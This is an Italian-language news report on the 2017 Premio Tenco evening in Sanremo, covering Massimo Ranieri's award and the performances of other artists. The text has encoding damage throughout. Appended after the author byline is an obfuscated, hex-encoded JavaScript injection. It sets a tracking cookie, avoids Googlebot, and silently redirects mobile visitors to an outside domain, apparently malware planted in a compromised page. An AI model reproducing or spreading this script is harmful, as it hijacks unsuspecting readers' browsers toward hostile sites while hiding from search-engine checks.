News

Il Teatro Ariston di Sanremo ospita l’edizione 2017 del Premio Tenco

” Juke box, radio e televisione, prestigiosi teatri e cinema, non c’A? mezzo o luogo di comunicazione che non abbia diffuso il patrimonio onnicomprensivo della sua musica conquistando ogni tipo di pubblico, come conviene solo a grandi artisti. La sua straordinaria rivisitazione del repertorio della canzone di Napoli, sua cittA� natale, esaltata dalla “nuova mediterraneitA�” di Mauro Pagani o dalla lettura jazz, fa di lui, al contempo, un grande divulgatore della tradizione e il prototipo di inedite forme espressive e artistiche”.

Questa A? la motivazione per cui A? stato assegnato ieri a MASSIMO RANIERI il Premio Tenco 2017 all’operatore culturale. L’artista, con la straordinaria Orchestra Sinfonica di Sanremo e un impareggiabile Mario Pagani, ha rappresentato il momento culminante di una serata che ha visto sul palco incisive esibizioni di artisti nazionali e internazionali, primo tra i quali Juan Carlos “Flaco” Biondini, chitarrista e collaboratore di vari artisti italiani, in particolare Francesco Guccini.

Nella presente edizione del Premio, dedicata alle “Terre di mare” non poteva mancare PEPPE VOLTARELLI, cantante cosentino la cui voce, ruvida e potente, ha risvegliato suggestive atmosfere nella rivisitazione di brani dedicati ad alcune cittA� portuali, interpretati con grinta graffiante e grande cuore.

L’accurata articolazione del programma ha poi proposto un intenso CAMANE’ che si A? speso con generositA� nel proporre tipici brani del suo repertorio di “fado“. Come sottolineato nella motivazione del Premio all’operatore culturale, “Il Fado A? l’anima e l’icona musicale di Lisbona, capitale di viaggi e di esplorazioni. Da quando, nel 2011, l’Unesco l’ha proclamato “patrimonio culturale immateriale dell’UmanitA�”, molti cantanti prestigiosi infilano nel loro repertorio qualche canzone di questo genere. Ma noi premiamo colui che A? il cantante di Fado per antonomasia, l’erede naturale di Amalia Rodrigues e Alfredo Marceneiro, la voce in grado di divulgare le emozioni e la poesia che la cittA� di Lisbona tramanda da quasi sue secoli”.

Si A? esibito quindi il gruppo dei DINATATAK, formato da sei elementi di diverse nazionalitA�: una cantante, quattro musicisti e un ballerino di tip tap hanno apportato un gradevolissimo contributo personale alla canzone d’autore, fondendo nel loro linguaggio espressivo le diverse origini e dando vita a un momento musicale coinvolgente e colorito.

MASSIMO PRIVIERO ha di seguito interpretato tre intensi brani del suo album “All’Italia“, dedicato all’emigrazione intesa come viaggio verso un miglioramento, voluto o imposto, iniziando con “Fiume” per ricordare l’odissea di chi fu costretto a lasciare la propria terra non perchA? partigiano o fascista ma soltanto italiano, per concludere con un commosso omaggio, in cui ha coinvolto anche il pubblico, a Valeria Soresin e a tutte le vttime dell’attentato del “Bataclan”.

Con gli interventi di David Riondino ed Enrico Rustici, moderni menestrelli che si sono sfidati a colpi di improvvisazioni in rima sulla serata e i suoi ospiti, si A? infine giunti all’atteso intervento di MASSIMO RANIERI, premiato da Staino. L’artista ha, come sempre, regalato momenti di forte intensitA�: per restare in tema, A? un “porto” sicuro in cui talento, professionalitA� e sentimento ancora una volta si sono fusi a profondere energia ed emozione.

Si A? trattato, dunque, di una serata di profondo spessore, ospitata in una sede, quale l’Ariston di Sanremo, il cui palco conserva sempre un fascino particolare, accresciuto per l’occasione dalla scenografia semplice ed essenziale, messa in risalto da un raffinato gioco di luci mai invasivo che ha sapientemente valorizzato l’atmosfera di un avvenimento dedicato alla valenza culturale della canzone d’autore.

La manifestazione si conclude sabato 21 ottobre in cui saranno sul palco, tra gli altri, Vinicio Capossela, Sergio Cammariere, Alessio Arena, Ex-Otago, Gualtiero Bertelli, Bobo Rondelli.A�

 

Foto e articolo di: Marisa Daffaravar _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}